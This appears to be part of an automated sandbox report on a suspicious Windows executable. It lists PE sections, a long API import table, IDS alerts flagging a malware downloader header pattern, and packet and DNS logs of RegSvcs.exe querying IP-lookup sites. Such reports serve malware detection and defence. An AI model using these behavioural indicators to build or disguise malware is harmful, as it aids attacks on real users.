IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x4ede8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x113000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x4ede8	0x4ee00	bfe04f99d10dae32771335e32b71f505	False	0.9197052050316957	data	7.8762021667992705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x113000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xc9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xca148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xca6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc410	0x464bf	data			1.0003334085817979
RT_GROUP_ICON	0x1128d0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x112948	0x14	data	English	Great Britain	1.15
RT_VERSION	0x11295c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x112a38	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T07:47:07.003618+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:08.412852+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:11.537970+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:13.206173+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	104.21.67.152	443	TCP
2024-11-22T07:47:15.522259+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	193.122.130.0	80	TCP
2024-11-22T07:47:19.115995+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49709	193.122.130.0	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 07:47:03.358283997 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:03.477823019 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:03.477978945 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:03.478424072 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:03.597839117 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:05.629949093 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:05.667089939 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:05.786705971 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:06.986040115 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:07.003618002 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:07.123079062 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:08.372770071 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:08.412852049 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:08.895407915 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:08.895452023 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:08.895539045 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:08.925770998 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:08.925791979 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.450632095 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.450762987 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:10.473683119 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:10.473711014 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.473969936 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.522243023 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:10.645076990 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:10.691339970 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.982584000 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.982645988 CET	443	49705	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:10.982800961 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:11.016041040 CET	49705	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:11.025480032 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:11.145421982 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:11.490664959 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:11.492795944 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:11.492846012 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:11.492923975 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:11.493273973 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:11.493287086 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:11.537970066 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:12.751029968 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:12.757783890 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:12.757812023 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:13.206156969 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:13.206235886 CET	443	49706	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:13.206341982 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:13.207082987 CET	49706	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:13.211364031 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:13.212584019 CET	49707	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:13.332983017 CET	80	49704	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:13.333004951 CET	80	49707	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:13.333093882 CET	49704	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:13.333137035 CET	49707	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:13.333329916 CET	49707	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:13.453808069 CET	80	49707	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:15.476186037 CET	80	49707	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:15.481429100 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:15.522258997 CET	49707	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:15.600990057 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:15.601125956 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:15.601291895 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:15.720712900 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:17.741354942 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:17.745183945 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:17.864855051 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:19.073693991 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:19.078927040 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:19.115994930 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:19.198561907 CET	80	49723	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:19.198678970 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:19.198787928 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:19.318377018 CET	80	49723	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:21.468491077 CET	80	49723	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:21.469259024 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:21.470160007 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:21.470263958 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:21.470428944 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:21.474442005 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:21.474482059 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:21.522253036 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:21.589277983 CET	80	49709	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:21.589406967 CET	49709	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:22.731997013 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:22.746479034 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:22.746555090 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:23.185483932 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:23.185550928 CET	443	49731	104.21.67.152	192.168.2.5
Nov 22, 2024 07:47:23.185622931 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:23.186120033 CET	49731	443	192.168.2.5	104.21.67.152
Nov 22, 2024 07:47:23.189697027 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:23.190907001 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:23.309391975 CET	80	49723	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:23.309565067 CET	49723	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:23.310349941 CET	80	49733	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:23.310416937 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:23.310553074 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:47:23.429999113 CET	80	49733	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:25.458650112 CET	80	49733	193.122.130.0	192.168.2.5
Nov 22, 2024 07:47:25.506622076 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:48:20.475864887 CET	80	49707	193.122.130.0	192.168.2.5
Nov 22, 2024 07:48:20.478177071 CET	49707	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:48:30.466525078 CET	80	49733	193.122.130.0	192.168.2.5
Nov 22, 2024 07:48:30.466936111 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:49:03.194453001 CET	49733	80	192.168.2.5	193.122.130.0
Nov 22, 2024 07:49:03.314179897 CET	80	49733	193.122.130.0	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 07:47:03.215089083 CET	53653	53	192.168.2.5	1.1.1.1
Nov 22, 2024 07:47:03.351866007 CET	53	53653	1.1.1.1	192.168.2.5
Nov 22, 2024 07:47:08.435782909 CET	49530	53	192.168.2.5	1.1.1.1
Nov 22, 2024 07:47:08.893973112 CET	53	49530	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 07:47:03.215089083 CET	192.168.2.5	1.1.1.1	0x3e8f	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:08.435782909 CET	192.168.2.5	1.1.1.1	0xa0dd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:03.351866007 CET	1.1.1.1	192.168.2.5	0x3e8f	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:08.893973112 CET	1.1.1.1	192.168.2.5	0xa0dd	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 22, 2024 07:47:08.893973112 CET	1.1.1.1	192.168.2.5	0xa0dd	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.122.130.0	80	1560	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 07:47:03.478424072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 22, 2024 07:47:05.629949093 CET	320	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 06:47:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bbd7e48c402ec7c0451b255cd49f53ac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 22, 2024 07:47:05.667089939 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
